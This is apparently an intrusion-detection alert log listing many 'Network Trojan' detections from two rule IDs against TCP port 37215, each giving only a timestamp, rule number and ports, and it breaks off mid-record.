                Timestamp:05/29/24-15:16:22.868472
                SID:2829579
                Source Port:58516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227798
                SID:2835222
                Source Port:50590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.113061
                SID:2835222
                Source Port:34444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.665243
                SID:2835222
                Source Port:40782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.919654
                SID:2835222
                Source Port:51190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.612251
                SID:2835222
                Source Port:32794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.783090
                SID:2829579
                Source Port:46426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597941
                SID:2829579
                Source Port:56808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.380319
                SID:2829579
                Source Port:56292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.579431
                SID:2829579
                Source Port:39540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.458262
                SID:2829579
                Source Port:58694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.628709
                SID:2835222
                Source Port:56178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653174
                SID:2829579
                Source Port:57578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.894770
                SID:2829579
                Source Port:35858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.610009
                SID:2835222
                Source Port:47410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.466147
                SID:2835222
                Source Port:60202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.668207
                SID:2835222
                Source Port:44422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.857017
                SID:2835222
                Source Port:40352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.588613
                SID:2829579
                Source Port:37042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264635
                SID:2835222
                Source Port:40754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.154525
                SID:2835222
                Source Port:38610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166344
                SID:2835222
                Source Port:60604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263183
                SID:2835222
                Source Port:46344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.949698
                SID:2835222
                Source Port:51470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.558995
                SID:2835222
                Source Port:42632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.968443
                SID:2835222
                Source Port:60564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.507319
                SID:2835222
                Source Port:42440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.586871
                SID:2835222
                Source Port:50152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.135367
                SID:2835222
                Source Port:42430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.114258
                SID:2829579
                Source Port:57680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.740426
                SID:2835222
                Source Port:56730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.739811
                SID:2835222
                Source Port:37910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.782335
                SID:2829579
                Source Port:40134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.626496
                SID:2829579
                Source Port:47662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335689
                SID:2835222
                Source Port:46304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.290270
                SID:2829579
                Source Port:56352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136800
                SID:2829579
                Source Port:38918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.262682
                SID:2835222
                Source Port:58368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618654
                SID:2829579
                Source Port:48358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.783781
                SID:2829579
                Source Port:33344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.873565
                SID:2829579
                Source Port:53756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.975396
                SID:2835222
                Source Port:39250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.685060
                SID:2829579
                Source Port:49740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.981464
                SID:2835222
                Source Port:55382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.163666
                SID:2835222
                Source Port:53290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.044310
                SID:2835222
                Source Port:36892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675195
                SID:2835222
                Source Port:41548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.966722
                SID:2835222
                Source Port:37308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.388711
                SID:2829579
                Source Port:50388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.264875
                SID:2829579
                Source Port:33358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.281697
                SID:2835222
                Source Port:44044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.971982
                SID:2829579
                Source Port:48586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140368
                SID:2829579
                Source Port:41846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968215
                SID:2829579
                Source Port:37444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.815684
                SID:2829579
                Source Port:60392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.269931
                SID:2829579
                Source Port:44696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.668598
                SID:2835222
                Source Port:58062
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.650556
                SID:2835222
                Source Port:41824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.268628
                SID:2835222
                Source Port:43122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.929513
                SID:2829579
                Source Port:33038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.969813
                SID:2829579
                Source Port:38022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166215
                SID:2829579
                Source Port:32908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.903760
                SID:2829579
                Source Port:34554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.712026
                SID:2835222
                Source Port:45106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.286710
                SID:2835222
                Source Port:57650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.629025
                SID:2829579
                Source Port:55616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.782251
                SID:2829579
                Source Port:54332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.227527
                SID:2829579
                Source Port:51814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209464
                SID:2835222
                Source Port:43834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897276
                SID:2829579
                Source Port:35538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175479
                SID:2829579
                Source Port:46068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.512283
                SID:2829579
                Source Port:43728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.729058
                SID:2829579
                Source Port:40132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.417135
                SID:2835222
                Source Port:57942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.902045
                SID:2829579
                Source Port:60204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.804939
                SID:2829579
                Source Port:43204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.073759
                SID:2835222
                Source Port:39310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.726253
                SID:2835222
                Source Port:34022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.868023
                SID:2835222
                Source Port:43340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.984723
                SID:2835222
                Source Port:34004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.981924
                SID:2835222
                Source Port:49416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.965272
                SID:2829579
                Source Port:59948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.878031
                SID:2829579
                Source Port:36978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.684561
                SID:2829579
                Source Port:53606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.515463
                SID:2835222
                Source Port:42844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.504188
                SID:2829579
                Source Port:49548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.414748
                SID:2829579
                Source Port:51206
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.461268
                SID:2835222
                Source Port:34960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.430839
                SID:2829579
                Source Port:56374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.468489
                SID:2835222
                Source Port:38214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.969647
                SID:2829579
                Source Port:50080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.887486
                SID:2835222
                Source Port:57126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.713278
                SID:2835222
                Source Port:58136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.292135
                SID:2835222
                Source Port:50306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.850509
                SID:2829579
                Source Port:42162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.984990
                SID:2835222
                Source Port:53422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.042576
                SID:2829579
                Source Port:47992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.716401
                SID:2829579
                Source Port:44440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.855731
                SID:2835222
                Source Port:41656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.228353
                SID:2829579
                Source Port:50612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.565065
                SID:2835222
                Source Port:43830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.665188
                SID:2835222
                Source Port:52444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.643861
                SID:2835222
                Source Port:38238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.833446
                SID:2835222
                Source Port:44140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.160351
                SID:2829579
                Source Port:51234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559459
                SID:2829579
                Source Port:42664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968719
                SID:2829579
                Source Port:37392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.582816
                SID:2835222
                Source Port:57646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.371542
                SID:2835222
                Source Port:49932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.071464
                SID:2829579
                Source Port:42152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652768
                SID:2829579
                Source Port:55672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.969700
                SID:2835222
                Source Port:44978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.993944
                SID:2835222
                Source Port:34684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.688209
                SID:2829579
                Source Port:47956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.292535
                SID:2829579
                Source Port:43080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.074744
                SID:2829579
                Source Port:38694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.120346
                SID:2835222
                Source Port:34718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.287453
                SID:2829579
                Source Port:47302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.555821
                SID:2835222
                Source Port:42628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584285
                SID:2829579
                Source Port:59242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.683619
                SID:2835222
                Source Port:58726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931625
                SID:2829579
                Source Port:38736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.612880
                SID:2835222
                Source Port:57400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.904974
                SID:2829579
                Source Port:35220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.818195
                SID:2829579
                Source Port:51730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667372
                SID:2829579
                Source Port:57066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.023347
                SID:2829579
                Source Port:60466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.522744
                SID:2835222
                Source Port:50658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.133864
                SID:2835222
                Source Port:58024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521880
                SID:2835222
                Source Port:41554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.916693
                SID:2835222
                Source Port:38566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.116418
                SID:2835222
                Source Port:60646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.849516
                SID:2829579
                Source Port:57650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.455182
                SID:2829579
                Source Port:55532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.615258
                SID:2835222
                Source Port:55942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.913949
                SID:2835222
                Source Port:50796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675378
                SID:2835222
                Source Port:51262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.787056
                SID:2829579
                Source Port:59934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.728497
                SID:2835222
                Source Port:47480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.364477
                SID:2835222
                Source Port:43088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.931950
                SID:2835222
                Source Port:33354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.180695
                SID:2829579
                Source Port:34870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.730746
                SID:2835222
                Source Port:35964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.208094
                SID:2829579
                Source Port:40760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.943057
                SID:2829579
                Source Port:57404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584260
                SID:2829579
                Source Port:33106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.442771
                SID:2835222
                Source Port:34686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.155068
                SID:2829579
                Source Port:53580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.001226
                SID:2835222
                Source Port:45748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.555387
                SID:2835222
                Source Port:58656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928335
                SID:2835222
                Source Port:60142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.080148
                SID:2829579
                Source Port:53500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.502668
                SID:2835222
                Source Port:40334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.077523
                SID:2829579
                Source Port:54462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.463503
                SID:2829579
                Source Port:59656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.445390
                SID:2835222
                Source Port:59880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.500451
                SID:2829579
                Source Port:50736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.038624
                SID:2835222
                Source Port:43754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281797
                SID:2829579
                Source Port:58846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.980949
                SID:2829579
                Source Port:39860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.895920
                SID:2829579
                Source Port:48408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584243
                SID:2835222
                Source Port:47792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.903548
                SID:2835222
                Source Port:36686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.505371
                SID:2835222
                Source Port:42278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.873121
                SID:2829579
                Source Port:48020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.461958
                SID:2829579
                Source Port:57536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.857100
                SID:2829579
                Source Port:37702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.615218
                SID:2829579
                Source Port:50640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.074508
                SID:2829579
                Source Port:45106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.643214
                SID:2829579
                Source Port:45182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263118
                SID:2835222
                Source Port:59852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361716
                SID:2835222
                Source Port:49680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663271
                SID:2835222
                Source Port:50726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559765
                SID:2829579
                Source Port:47416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.500290
                SID:2835222
                Source Port:36134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.562245
                SID:2829579
                Source Port:53184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.716309
                SID:2835222
                Source Port:35322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.783183
                SID:2829579
                Source Port:58896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.179753
                SID:2829579
                Source Port:60186
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.950124
                SID:2835222
                Source Port:34258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.687129
                SID:2829579
                Source Port:48796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.819099
                SID:2835222
                Source Port:41222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.023183
                SID:2829579
                Source Port:60176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.852841
                SID:2835222
                Source Port:36568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.008978
                SID:2835222
                Source Port:47194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.235100
                SID:2829579
                Source Port:55298
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765483
                SID:2829579
                Source Port:42726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561876
                SID:2829579
                Source Port:35024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.966380
                SID:2835222
                Source Port:40116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.576533
                SID:2835222
                Source Port:41790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.799420
                SID:2835222
                Source Port:50710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.001072
                SID:2829579
                Source Port:48490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766781
                SID:2835222
                Source Port:33452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.562061
                SID:2835222
                Source Port:45308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.613071
                SID:2835222
                Source Port:46370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.525344
                SID:2829579
                Source Port:56114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782843
                SID:2835222
                Source Port:38238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.781766
